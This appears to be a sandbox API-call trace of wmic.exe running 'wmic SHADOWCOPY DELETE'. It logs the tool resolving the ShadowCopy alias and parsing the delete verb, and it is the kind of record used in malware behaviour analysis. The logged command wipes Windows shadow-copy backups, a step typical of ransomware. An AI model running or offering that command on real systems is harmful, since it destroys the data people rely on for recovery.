IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.743] malloc (_Size=0x18) returned 0x2dc730 [0104.743] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.744] free (_Block=0x2dc730) [0104.744] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0104.744] malloc (_Size=0x18) returned 0x2dc730 [0104.744] malloc (_Size=0x18) returned 0x2dc750 [0104.744] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.744] SysStringLen (param_1="TABLE") returned 0x5 [0104.744] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.744] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.744] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.744] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.744] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.744] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.744] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.744] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.744] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.744] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.744] malloc (_Size=0x30) returned 0x2d8580 [0104.744] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.744] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.744] IUnknown:Release (This=0x225a280) returned 0x0 [0104.744] IUnknown:Release (This=0x2259cc0) returned 0x0 [0104.744] FreeThreadedDOMDocument:IUnknown:Release (This=0x225bc50) returned 0x1 [0104.744] FreeThreadedDOMDocument:IUnknown:Release (This=0x22571d0) returned 0x0 [0104.744] free (_Block=0x2d6d70) [0104.744] GetCommandLineW () returned="wmic SHADOWCOPY DELETE" [0104.745] malloc (_Size=0x30) returned 0x2d85c0 [0104.745] memcpy_s (in: _Destination=0x2d85c0, _DestinationSize=0x2e, _Source=0x725be, _SourceSize=0x2e | out: _Destination=0x2d85c0) returned 0x0 [0104.745] malloc (_Size=0x18) returned 0x2dc770 [0104.745] malloc (_Size=0x18) returned 0x2dc790 [0104.745] malloc (_Size=0x18) returned 0x2dc7b0 [0104.746] malloc (_Size=0x18) returned 0x2dc7d0 [0104.746] malloc (_Size=0x80) returned 0x2d6d70 [0104.746] GetLocalTime (in: lpSystemTime=0x28f850 | out: lpSystemTime=0x28f850*(wYear=0x7e3, wMonth=0xb, wDayOfWeek=0x5, wDay=0x8, wHour=0x0, wMinute=0x17, wSecond=0x25, wMilliseconds=0x2ea)) [0104.746] _vsnwprintf (in: _Buffer=0x2d6d70, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x28f7a8 | out: _Buffer="11-08-2019T00:23:37") returned 19 [0104.746] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.746] malloc (_Size=0x28) returned 0x2d6e70 [0104.746] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.746] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.746] malloc (_Size=0x28) returned 0x2d6ea0 [0104.746] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.746] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.746] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.746] malloc (_Size=0x16) returned 0x2dc7f0 [0104.746] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.746] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81 [0104.746] malloc (_Size=0x16) returned 0x2dc810 [0104.746] malloc (_Size=0x8) returned 0x2d6e00 [0104.746] free (_Block=0x0) [0104.746] free (_Block=0x2dc7f0) [0104.746] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.746] malloc (_Size=0xe) returned 0x2dc7f0 [0104.746] lstrlenW (lpString="DELETE") returned 6 [0104.746] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66 [0104.746] malloc (_Size=0xe) returned 0x2dc830 [0104.746] malloc (_Size=0x10) returned 0x2dc850 [0104.746] memmove_s (in: _Destination=0x2dc850, _DestinationSize=0x8, _Source=0x2d6e00, _SourceSize=0x8 | out: _Destination=0x2dc850) returned 0x0 [0104.746] free (_Block=0x2d6e00) [0104.746] free (_Block=0x0) [0104.746] free (_Block=0x2dc7f0) [0104.747] malloc (_Size=0x10) returned 0x2dc7f0 [0104.747] lstrlenW (lpString="QUIT") returned 4 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.747] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0104.747] lstrlenW (lpString="EXIT") returned 4 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.747] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0104.747] free (_Block=0x2dc7f0) [0104.747] WbemLocator:IUnknown:AddRef (This=0x1d71390) returned 0x2 [0104.747] malloc (_Size=0x10) returned 0x2dc7f0 [0104.747] lstrlenW (lpString="/") returned 1 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.747] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0104.747] lstrlenW (lpString="-") returned 1 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.747] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0104.747] lstrlenW (lpString="CLASS") returned 5 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.747] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0104.747] lstrlenW (lpString="PATH") returned 4 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.747] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0104.747] lstrlenW (lpString="CONTEXT") returned 7 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.747] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.747] malloc (_Size=0x16) returned 0x2dc870 [0104.747] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.748] GetCurrentThreadId () returned 0x41c [0104.748] ??0CHString@@QEAA@XZ () returned 0x28f660 [0104.748] malloc (_Size=0x18) returned 0x2dc890 [0104.748] malloc (_Size=0x18) returned 0x2dc8b0 [0104.748] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d71390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4d2998 | out: ppNamespace=0xff4d2998*=0x1d83a98) returned 0x0 [0105.294] free (_Block=0x2dc8b0) [0105.294] free (_Block=0x2dc890) [0105.294] CoSetProxyBlanket (pProxy=0x1d83a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0105.294] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.295] GetCurrentThreadId () returned 0x41c [0105.295] ??0CHString@@QEAA@XZ () returned 0x28f4f8 [0105.295] malloc (_Size=0x18) returned 0x2dc890 [0105.295] malloc (_Size=0x18) returned 0x2dc8b0 [0105.295] malloc (_Size=0x18) returned 0x2dc8d0 [0105.295] malloc (_Size=0x18) returned 0x2dc8f0 [0105.295] SysStringLen (param_1="root\\cli") returned 0x8 [0105.295] SysStringLen (param_1="\\") returned 0x1 [0105.295] malloc (_Size=0x18) returned 0x2dc910 [0105.295] SysStringLen (param_1="root\\cli\\") returned 0x9 [0105.295] SysStringLen (param_1="ms_409") returned 0x6 [0105.295] free (_Block=0x2dc8f0) [0105.295] free (_Block=0x2dc8d0) [0105.295] free (_Block=0x2dc8b0) [0105.295] free (_Block=0x2dc890) [0105.295] malloc (_Size=0x18) returned 0x2dc890 [0105.295] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d71390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4d29a0 | out: ppNamespace=0xff4d29a0*=0x1d83b28) returned 0x0 [0105.306] free (_Block=0x2dc890) [0105.306] free (_Block=0x2dc910) [0105.306] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.307] GetCurrentThreadId () returned 0x41c [0105.307] ??0CHString@@QEAA@XZ () returned 0x28f670 [0105.307] malloc (_Size=0x18) returned 0x2dc910 [0105.307] malloc (_Size=0x18) returned 0x2dc890 [0105.307] malloc (_Size=0x18) returned 0x2dc8b0 [0105.307] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0105.307] malloc (_Size=0x3a) returned 0x2dca40 [0105.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff461980, cbMultiByte=-1, lpWideCharStr=0x2dca40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0105.307] free (_Block=0x2dca40) [0105.307] malloc (_Size=0x18) returned 0x2dc8d0 [0105.307] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0105.307] SysStringLen (param_1="SHADOWCOPY") returned 0xa [0105.307] malloc (_Size=0x18) returned 0x2dc8f0 [0105.307] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SHADOWCOPY") returned 0x26 [0105.307] SysStringLen (param_1="'") returned 0x1 [0105.307] free (_Block=0x2dc8d0) [0105.307] free (_Block=0x2dc8b0) [0105.307] free (_Block=0x2dc890) [0105.307] free (_Block=0x2dc910) [0105.307] IWbemServices:GetObject (in: This=0x1d83a98, strObjectPath="MSFT_CliAlias.FriendlyName='SHADOWCOPY'", lFlags=0, pCtx=0x0, ppObject=0x28f678*=0x0, ppCallResult=0x0 | out: ppObject=0x28f678*=0x1d904e0, ppCallResult=0x0) returned 0x0 [0105.318] malloc (_Size=0x18) returned 0x2dc910 [0105.318] IWbemClassObject:Get (in: This=0x1d904e0, wszName="Target", lFlags=0, pVal=0x28f5a0*(varType=0x0, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4d2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f5a0*(varType=0x8, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.319] free (_Block=0x2dc910) [0105.319] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.319] malloc (_Size=0x3e) returned 0x2dca40 [0105.319] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.319] malloc (_Size=0x18) returned 0x2dc910 [0105.319] IWbemClassObject:Get (in: This=0x1d904e0, wszName="PWhere", lFlags=0, pVal=0x28f5a0*(varType=0x0, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=0x9e058, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f5a0*(varType=0x8, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.319] free (_Block=0x2dc910) [0105.319] lstrlenW (lpString=" Where ID = '#'") returned 15 [0105.319] malloc (_Size=0x20) returned 0x2dca90 [0105.319] lstrlenW (lpString=" Where ID = '#'") returned 15 [0105.319] malloc (_Size=0x18) returned 0x2dc910 [0105.319] IWbemClassObject:Get (in: This=0x1d904e0, wszName="Connection", lFlags=0, pVal=0x28f5a0*(varType=0x0, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=0xed6c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f5a0*(varType=0xd, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d909c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.319] free (_Block=0x2dc910) [0105.319] IUnknown:QueryInterface (in: This=0x1d909c0, riid=0xff467360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x28f590 | out: ppvObject=0x28f590*=0x1d909c0) returned 0x0 [0105.319] GetCurrentThreadId () returned 0x41c [0105.319] ??0CHString@@QEAA@XZ () returned 0x28f4b8 [0105.319] malloc (_Size=0x18) returned 0x2dc910 [0105.319] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Namespace", lFlags=0, pVal=0x28f4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff47738f, varVal2=0x2dc910), pType=0x0, plFlavor=0x0 | out: pVal=0x28f4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x2dc910), pType=0x0, plFlavor=0x0) returned 0x0 [0105.319] free (_Block=0x2dc910) [0105.319] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0105.320] malloc (_Size=0x16) returned 0x2dc910 [0105.320] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0105.320] malloc (_Size=0x18) returned 0x2dc890 [0105.320] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Locale", lFlags=0, pVal=0x28f4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0x2dc910), pType=0x0, plFlavor=0x0 | out: pVal=0x28f4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x2dc910), pType=0x0, plFlavor=0x0) returned 0x0 [0105.320] free (_Block=0x2dc890) [0105.320] lstrlenW (lpString="ms_409") returned 6 [0105.320] malloc (_Size=0xe) returned 0x2dc890 [0105.320] lstrlenW (lpString="ms_409") returned 6 [0105.320] malloc (_Size=0x18) returned 0x2dc8b0 [0105.320] IWbemClassObject:Get (in: This=0x1d909c0, wszName="User", lFlags=0, pVal=0x28f4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0x2dc910), pType=0x0, plFlavor=0x0 | out: pVal=0x28f4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0x2dc910), pType=0x0, plFlavor=0x0) returned 0x0 [0105.320] free (_Block=0x2dc8b0) [0105.320] malloc (_Size=0x18) returned 0x2dc8b0 [0105.320] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Password", lFlags=0, pVal=0x28f4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0x2dc910), pType=0x0, plFlavor=0x0 | out: pVal=0x28f4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0x2dc910), pType=0x0, plFlavor=0x0) returned 0x0 [0105.320] free (_Block=0x2dc8b0) [0105.320] malloc (_Size=0x18) returned 0x2dc8b0 [0105.320] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Server", lFlags=0, pVal=0x28f4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0x2dc910), pType=0x0, plFlavor=0x0 | out: pVal=0x28f4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x2dc910), pType=0x0, plFlavor=0x0) returned 0x0 [0105.320] free (_Block=0x2dc8b0) [0105.320] lstrlenW (lpString=".") returned 1 [0105.320] malloc (_Size=0x4) returned 0x2d6e00 [0105.320] lstrlenW (lpString=".") returned 1 [0105.320] malloc (_Size=0x18) returned 0x2dc8b0 [0105.320] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Authority", lFlags=0, pVal=0x28f4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0x2dc910), pType=0x0, plFlavor=0x0 | out: pVal=0x28f4e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0x2dc910), pType=0x0, plFlavor=0x0) returned 0x0 [0105.320] free (_Block=0x2dc8b0) [0105.321] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.321] IUnknown:Release (This=0x1d909c0) returned 0x1 [0105.321] GetCurrentThreadId () returned 0x41c [0105.321] ??0CHString@@QEAA@XZ () returned 0x28f4b8 [0105.321] malloc (_Size=0x18) returned 0x2dc8b0 [0105.321] IWbemClassObject:Get (in: This=0x1d904e0, wszName="__RELPATH", lFlags=0, pVal=0x28f4e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1196c8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x28f4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0105.321] free (_Block=0x2dc8b0) [0105.321] malloc (_Size=0x18) returned 0x2dc8b0 [0105.321] GetCurrentThreadId () returned 0x41c [0105.321] ??0CHString@@QEAA@XZ () returned 0x28f338 [0105.321] ??0CHString@@QEAA@PEBG@Z () returned 0x28f350 [0105.321] ??0CHString@@QEAA@AEBV0@@Z () returned 0x28f2e0 [0105.321] ?Empty@CHString@@QEAAXXZ () returned 0x7fef2dc482c [0105.321] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2dcac0 [0105.322] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0105.322] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x28f2a0 [0105.322] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x28f2e8 [0105.322] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f350 [0105.323] ??1CHString@@QEAA@XZ () returned 0x10169501 [0105.323] ??1CHString@@QEAA@XZ () returned 0x10169501 [0105.323] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x28f2a8 [0105.323] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f2e0 [0105.323] ??1CHString@@QEAA@XZ () returned 0x1 [0105.323] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2dcb30 [0105.323] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0105.323] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x28f2a0 [0105.323] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x28f2e8 [0105.323] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f350 [0105.323] ??1CHString@@QEAA@XZ () returned 0x10169501 [0105.323] ??1CHString@@QEAA@XZ () returned 0x10169501 [0105.323] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x28f2a8 [0105.323] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f2e0 [0105.323] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.323] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef2dc4820 [0105.323] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.323] malloc (_Size=0x18) returned 0x2dc8d0 [0105.323] malloc (_Size=0x18) returned 0x2dc930 [0105.323] malloc (_Size=0x18) returned 0x2dc950 [0105.324] malloc (_Size=0x18) returned 0x2dc970 [0105.324] malloc (_Size=0x18) returned 0x2dc990 [0105.324] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0105.324] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0105.324] malloc (_Size=0x18) returned 0x2dc9b0 [0105.324] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0105.324] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0105.324] malloc (_Size=0x18) returned 0x2dc9d0 [0105.324] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0105.324] SysStringLen (param_1="\"") returned 0x1 [0105.324] free (_Block=0x2dc9b0) [0105.324] free (_Block=0x2dc990) [0105.324] free (_Block=0x2dc970) [0105.324] free (_Block=0x2dc950) [0105.324] free (_Block=0x2dc930) [0105.324] free (_Block=0x2dc8d0) [0105.324] IWbemServices:GetObject (in: This=0x1d83b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x28f328*=0x0, ppCallResult=0x0 | out: ppObject=0x28f328*=0x1d90a50, ppCallResult=0x0) returned 0x0 [0105.326] malloc (_Size=0x18) returned 0x2dc8d0 [0105.326] IWbemClassObject:Get (in: This=0x1d90a50, wszName="Text", lFlags=0, pVal=0x28f360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4d2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x28f360*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x118c10*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x9ddf0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0105.326] free (_Block=0x2dc8d0) [0105.326] SafeArrayGetLBound (in: psa=0x118c10, nDim=0x1, plLbound=0x28f340 | out: plLbound=0x28f340) returned 0x0 [0105.326] SafeArrayGetUBound (in: psa=0x118c10, nDim=0x1, plUbound=0x28f330 | out: plUbound=0x28f330) returned 0x0 [0105.326] SafeArrayGetElement (in: psa=0x118c10, rgIndices=0x28f324, pv=0x28f378 | out: pv=0x28f378) returned 0x0 [0105.326] malloc (_Size=0x18) returned 0x2dc8d0 [0105.326] malloc (_Size=0x18) returned 0x2dc930 [0105.326] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0105.326] free (_Block=0x2dc8d0) [0105.326] IUnknown:Release (This=0x1d90a50) returned 0x0 [0105.326] free (_Block=0x2dc9d0) [0105.326] ??1CHString@@QEAA@XZ () returned 0x10169501 [0105.326] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.327] free (_Block=0x2dc8b0) [0105.327] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.327] lstrlenW (lpString="Shadow copy management.") returned 23 [0105.327] malloc (_Size=0x30) returned 0x2d8600 [0105.327] lstrlenW (lpString="Shadow copy management.") returned 23 [0105.327] free (_Block=0x2dc930) [0105.327] IUnknown:Release (This=0x1d904e0) returned 0x0 [0105.327] free (_Block=0x2dc8f0) [0105.327] ??1CHString@@QEAA@XZ () returned 0x7fef2dc482c [0105.327] lstrlenW (lpString="PATH") returned 4 [0105.327] lstrlenW (lpString="DELETE") returned 6 [0105.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0105.327] lstrlenW (lpString="WHERE") returned 5 [0105.327] lstrlenW (lpString="DELETE") returned 6 [0105.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0105.327] lstrlenW (lpString="(") returned 1 [0105.327] lstrlenW (lpString="DELETE") returned 6 [0105.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0105.327] lstrlenW (lpString="/") returned 1 [0105.327] lstrlenW (lpString="DELETE") returned 6 [0105.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0105.327] lstrlenW (lpString="-") returned 1 [0105.327] lstrlenW (lpString="DELETE") returned 6 [0105.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0105.327] malloc (_Size=0x18) returned 0x2dc8f0 [0105.327] lstrlenW (lpString="GET") returned 3 [0105.327] lstrlenW (lpString="DELETE") returned 6 [0105.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0105.328] lstrlenW (lpString="LIST") returned 4 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0105.328] lstrlenW (lpString="SET") returned 3 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0105.328] lstrlenW (lpString="CREATE") returned 6 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0105.328] lstrlenW (lpString="CALL") returned 4 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0105.328] lstrlenW (lpString="ASSOC") returned 5 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0105.328] free (_Block=0x2dc8f0) [0105.328] lstrlenW (lpString="/") returned 1 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0105.328] lstrlenW (lpString="-") returned 1 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] malloc (_Size=0xe) returned 0x2dc8f0 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] lstrlenW (lpString="GET") returned 3 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0105.328] lstrlenW (lpString="LIST") returned 4 [0105.328] lstrlenW (lpString="DELETE") returned 6 [0105.328] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0105.329] lstrlenW (lpString="SET") returned 3 [0105.329] lstrlenW (lpString="DELETE") returned 6 [0105.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0105.329] lstrlenW (lpString="CREATE") returned 6 [0105.329] lstrlenW (lpString="DELETE") returned 6 [0105.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0105.329] lstrlenW (lpString="CALL") returned 4 [0105.329] lstrlenW (lpString="DELETE") returned 6 [0105.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0105.329] lstrlenW (lpString="ASSOC") returned 5 [0105.329] lstrlenW (lpString="DELETE") returned 6 [0105.329] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0105.329] lstrlenW (lpString="DELETE") returned 6 [0105.329] 